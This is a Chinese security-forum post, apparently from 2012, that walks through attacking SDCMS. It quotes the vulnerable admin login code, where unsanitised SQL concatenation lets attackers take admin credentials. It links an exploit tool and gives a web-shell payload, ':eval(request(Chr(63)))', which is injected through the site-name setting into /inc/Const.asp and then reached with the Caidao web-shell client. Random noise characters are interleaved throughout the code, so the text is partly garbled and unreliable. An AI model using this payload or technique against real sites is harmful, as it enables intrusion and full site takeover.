作者:T00LS 鬼哥
9 @; }$ A, f9 Z$ o8 A, e/ D漏洞文件:后台目录/index.asp3 L8 y6 s& R/ \6 l
/ F/ K( Z8 j. y+ n7 [3 I/ K# z
Sub Check. p# z5 _. l4 J4 Q
Dim username,password,code,getcode,Rs
; U# P$ F/ |4 q) t: J6 Q IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub8 W0 r( b: O& k# m
username=FilterText(Trim(Request.Form("username")),1)& @; A9 V" q% a1 \) T" E( I3 t# g
password=FilterText(Trim(Request.Form("password")),1)
3 [' h" l$ |0 g code=Trim(Request.Form("yzm"))8 ~( w: [9 i. y& X8 F& l7 ~. t
getcode=Session("SDCMSCode")
$ Z( V7 z) n3 n IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
7 H; h# u/ O( I+ c IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied3 c, A: n2 u/ r) M
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied( H& M: Y& p& P3 v G3 ^/ j8 J
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied7 |1 b- _/ v: k
IF username="" or password="" Then
' f; e1 h8 |4 `7 C1 X- z Echo "用户名或密码不能为空"ied6 Y( q0 v2 l: v- \- x# w3 N1 M
Else
, X/ n; W' t2 E7 ? Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")+ h8 B" {! S* E( x
IF Rs.Eof Then
0 G: J( _' ?: P) ^ AddLog username,GetIp,"登录失败",1
4 Q8 @, m; N9 N, @ Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
+ r( N' B' U8 z! Y Else
1 |1 k, F: R% n( F Add_Cookies "sdcms_id",Rs(0)/ l6 V! _* D/ @2 C+ D) `
Add_Cookies "sdcms_name",username
4 M9 @; w$ E; k& @, P5 r Add_Cookies "sdcms_pwd",Rs(2)1 J/ e \% I4 J0 [" W* p
Add_Cookies "sdcms_admin",Rs(3)8 c1 T* f; X+ y; o/ }, s4 k
Add_Cookies "sdcms_alllever",Rs(4)
4 o5 m1 ^9 p0 q4 s2 [# d4 e Add_Cookies "sdcms_infolever",Rs(5)* [6 T, m- z4 ~
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")( ^9 ^3 F, ^) T7 ~! J9 i
AddLog username,GetIp,"登录成功",1
+ d# I4 k6 w/ ?/ b9 q9 E '自动删除30天前的Log记录% o. D$ r+ [0 p4 w1 s
IF Sdcms_DataType Then
! ~& g1 {; Y( s2 d- R- i Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
6 S q7 q1 X" T r# l Else
# t0 p# F0 A7 W7 D% f Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30"). v. j' J4 a+ o6 T8 v; |
End IF
) t0 ~+ x2 E3 b, X1 F+ ?$ N& @5 m Go("sdcms_index.asp")( `3 n# l5 N' W1 D9 Z' E
End IF
# K& n# [% P- x, U Rs.Close" ^& }& M+ P# G, g% _3 x
Set Rs=Nothing
% L" X( V) D2 n/ U0 M, G End IF0 `3 |" _. g# \
End Sub
: Z8 l) ? B2 i- q' _6 s
% I0 w/ ^! E/ s2 L+ c ?7 t' U( l8 [’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码& f. }& Z0 m# P- f/ P' K
9 M) e* i$ j; X' H
Function FilterText(ByVal t0,ByVal t1)
" K' m" `! q6 w) J7 l ] D& h IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
* G L% U2 f/ x9 d1 v t0=Trim(t0)0 s/ @2 v# x+ D
Select Case t1
0 }2 m" `& s% D+ _( H Case "1"
+ [! W1 u2 ~$ s" y p/ m t0=Replace(t0,Chr(32),"")4 {! R4 y5 Y0 L+ Q# l8 g
t0=Replace(t0,Chr(13),"")/ a/ C/ [% u5 y" [. }
t0=Replace(t0,Chr(10)&Chr(10),"")- ~( x$ X3 R5 U1 Z; m5 M
t0=Replace(t0,Chr(10),"")9 ]: ?" Y4 I# \' v3 C
Case "2"& {( }" P, m% J6 g+ X
t0=Replace(t0,Chr(8),"")'回格
( L0 Y. U! C3 X# T% { t0=Replace(t0,Chr(9),"")'tab(水平制表符)
( x2 A- u7 `& u5 X! K; |& j9 L2 B( M t0=Replace(t0,Chr(10),"")'换行7 V: H2 A/ t5 `8 c F2 `9 u
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
; L& A# m+ b2 ?/ _1 C6 b6 _% O t0=Replace(t0,Chr(12),"")'换页" u( _# c; \' F' J. g/ k4 X* g6 _
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合( e9 p3 J3 `9 _
t0=Replace(t0,Chr(22),"")( y6 C9 B. K3 T/ d/ D; B, r+ Z, {6 t
t0=Replace(t0,Chr(32),"")'空格 SPACE0 _. }# `5 O) E. L
t0=Replace(t0,Chr(33),"")'!* h% m2 Z* w+ C6 d3 P6 P
t0=Replace(t0,Chr(34),"")'"
8 N4 M; n3 d% e; x+ m t0=Replace(t0,Chr(35),"")'#* k- k! v; @) a$ Y
t0=Replace(t0,Chr(36),"")'$
- x6 z4 A) L0 W6 E2 G- f4 f t0=Replace(t0,Chr(37),"")'%+ l. |( i2 O4 f5 R7 t/ ?
t0=Replace(t0,Chr(38),"")'&6 R- \3 ~5 S. Y8 t1 {
t0=Replace(t0,Chr(39),"")''
0 r6 e3 M8 [) R/ Y9 } t0=Replace(t0,Chr(40),"")'(
, T+ g0 p; c5 n; [. J t0=Replace(t0,Chr(41),"")')3 {& z- y) |2 x# i" @- v5 q& ?4 i
t0=Replace(t0,Chr(42),"")'*
: _( J' [& x$ h% S t0=Replace(t0,Chr(43),"")'+
7 O/ t3 |, N/ Z$ ^( s6 ^ t0=Replace(t0,Chr(44),"")',
9 z& b9 q6 T) G t0=Replace(t0,Chr(45),"")'-. j3 [5 `: b+ b/ m# [4 `, T5 U0 b
t0=Replace(t0,Chr(46),"")'.
$ m2 y$ u6 @ x- {0 Y t0=Replace(t0,Chr(47),"")'/
1 P0 U' r6 u' M1 v t0=Replace(t0,Chr(58),"")':/ ~9 v, k- h$ P' |$ q$ K" M/ W- c# [
t0=Replace(t0,Chr(59),"")';6 s3 @8 d$ }. F3 r1 U) m! Q) R
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
' i+ [0 V/ q8 ], m! k3 F1 v t0=Replace(t0,Chr(63),"")'?
' g) i$ t1 y: u6 | t0=Replace(t0,Chr(64),"")'@* n2 d9 U; Q( t) o6 ]
t0=Replace(t0,Chr(91),"")'\7 a/ j3 G2 X& f M, w7 D
t0=Replace(t0,Chr(92),"")'\- c, @2 Y, u- U2 S
t0=Replace(t0,Chr(93),"")']
9 o8 F, I/ M, B4 S+ V t0=Replace(t0,Chr(94),"")'^: K4 g1 {3 r1 ?& f# b- a
t0=Replace(t0,Chr(95),"")'_( l; y# _5 z$ i$ c, ^3 ?1 ~# e
t0=Replace(t0,Chr(96),"")'`1 W7 ]! C$ Z! X, Z* D! \
t0=Replace(t0,Chr(123),"")'{
4 i8 D: [9 H; N( N( J, C t0=Replace(t0,Chr(124),"")'|# O5 s9 V! W: P9 n. s6 J
t0=Replace(t0,Chr(125),"")'}
; G B) n2 T) M$ a5 u t0=Replace(t0,Chr(126),"")'~
M( `$ q- a/ V3 A7 Z3 R1 J Case Else
, `2 i& \) Z5 b* U' L) Y( |2 P! E t0=Replace(t0, "&", "&")
/ ~- Z( z& m" Y& y4 C/ y+ i' b) ^* g5 i t0=Replace(t0, "'", "'"): w: w6 h. t" @# S/ o" _3 D( V
t0=Replace(t0, """", """)
8 }4 H7 ^, ]' P. k9 f$ v t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">"); W6 P6 t4 f+ ` B
End Select: W# Y( d. {/ a- a# z( W4 d
IF Instr(Lcase(t0),"expression")>0 Then) n5 P$ d- {1 W6 H8 X) s
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
, D* c* \. \7 o End If7 w7 T# M& l/ p/ B
FilterText=t0
8 z. y* o4 H' e6 {, X2 |) ]End Function
+ L& X' l* j' P9 O. r c8 D. H3 O l9 r4 J4 N. |# W
看到没。直接参数是1 只过滤
3 a( H6 B. C# p t0=Replace(t0,Chr(32)," ")+ T/ X; R% |- @5 d& C( i! n
t0=Replace(t0,Chr(13),"")4 m! q2 e; V: d( ?6 N" X
t0=Replace(t0,Chr(10)&Chr(10),"" A- P8 m0 X- p# T
")
3 J( o. y3 u3 v: L; z$ S t0=Replace(t0,Chr(10),") C* p$ G! E" [- g; E
")
4 \0 x% P0 e8 Z1 r0 \漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
( f( a% H) B8 C' X2 GEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP2 W4 ^, u6 T7 @1 ]" T
* Z" j6 W" {7 ~) }0 Y) M测试:
$ z9 D9 O7 x6 p$ m
% e0 B% w/ Q* b* D* H- Q; j l
/ _1 O, f0 @ A% x' a4 I" @现在输入工具上验证码,然后点OK0 k8 W$ j! i! D8 y
5 J8 n! g: L; K; c4 D0 I. {+ N
7 V- w" o% c# V6 N看到我们直接进入后台管理界面了,呵呵!8 `& t. l1 o" t [
# o6 l* b4 w" X/ _% i0 [
! k7 Z3 X3 P6 ] w8 L, B6 a0 O J5 x5 `5 s7 I3 ^( m5 ~) m7 H5 _
这样直接进入后台了。。。。' X6 o: v, g* D/ D0 s: z2 C# T
2 K1 k, [+ Y% G; \- M- \
+ F$ @, b8 Y9 [& W$ l
6 n* u7 J: `$ WSDCMS提权:) E- N6 b2 N% F, k
! q0 E8 c z: R
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?9 D: w! J& w$ g0 U$ \+ U1 |
" B) T, e8 P) ~1 E; U% y$ c$ p9 S* c7 [/ Q1 j6 r1 E
( a/ C1 E8 G& e" k- z. \
OK,现在用菜刀连接下!5 f& |7 ^. }7 P! Z. n+ H6 t
2 K* H* l3 X" G/ t: i1 l& Z4 `& o
* f! e- F# L; b- X3 }6 l
1 n8 K( c' I! X" N ( U- W! S z& p& e
: i* q9 F' {. B0 \$ H5 T7 s
|
发表于 2012-11-9 20:57:02
收藏
支持
反对